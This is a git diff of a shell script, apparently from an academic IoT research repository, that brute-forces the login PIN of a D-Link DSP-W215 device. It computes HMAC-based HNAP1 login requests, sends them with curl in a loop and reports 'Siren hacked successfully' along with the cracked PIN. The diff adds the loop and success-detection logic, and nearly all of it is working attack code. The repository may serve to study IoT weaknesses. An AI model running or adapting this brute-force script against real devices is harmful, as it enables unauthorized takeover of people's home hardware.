X-Git-Url: http://demsky.eecs.uci.edu/git/?a=blobdiff_plain;ds=sidebyside;f=benchmarks%2Fother%2FDLinkAlarm%2Fattack.sh;h=609f95a49ce310afa50d0e1252a59f235e8b6d34;hb=51bed0fb5f840d76127d5c4dca0fd145b801dcce;hp=39fb94eee0acf9d3ef42f26eeb72e965ed5b694f;hpb=c74a8d5a8f855f0a17dc5ae9d8bbabb790993dd9;p=iot2.git
diff --git a/benchmarks/other/DLinkAlarm/attack.sh b/benchmarks/other/DLinkAlarm/attack.sh
index 39fb94e..609f95a 100755
--- a/benchmarks/other/DLinkAlarm/attack.sh
+++ b/benchmarks/other/DLinkAlarm/attack.sh
@@ -1,7 +1,8 @@
#!/bin/bash
#modify next two line for your DSP-W215
-IP="192.168.0.35"
-PIN=215530
+IP="192.168.0.4"
+#PIN=0
+PIN=215500
#do not modify after this line if you don't know what you are doing
function usage {
@@ -29,6 +30,10 @@ end=""
message="requestadmin$password"
loginrequest="$head$message$end"
+loop=true
+while $loop
+ do
+
ret=`curl -s -X POST -H "$contentType" -H "$soapLogin" --data-binary "$loginrequest" http://$IP/HNAP1`
function getResult {
@@ -36,15 +41,12 @@ function getResult {
echo -n "$opt"
}
-PIN=0
-
-while true
- do
-echo -e $PIN
+echo -e "Current pin: $PIN"
let PIN=$PIN+1
challenge=`getResult Challenge`
cookie="Cookie: uid=`getResult Cookie`"
publickey="`getResult PublicKey`$PIN"
+echo -e "Public key: $publickey"
privatekey=`hash_hmac "$challenge" "$publickey"`
password=`hash_hmac "$challenge" "$privatekey"`
timestamp=`date +%s`
@@ -60,6 +62,13 @@ login="$head$message$end"
mret=`curl -s -X POST -H "$contentType" -H "$soapLogin" -H "$hnap_auth" -H "$cookie" --data-binary "$login" http://$IP/HNAP1`
echo -e "$mret"
+status=`echo -n "$mret" | grep -Po "(?<=).*(?=)"`
+echo -e "Status: $status\n\n"
+if [ $status = "success" ]
+then
+ echo -e "SUCCESSFUL ATTEMPT: Siren hacked successfully! The pin is: $PIN\n\n\n"
+ loop=false
+fi
done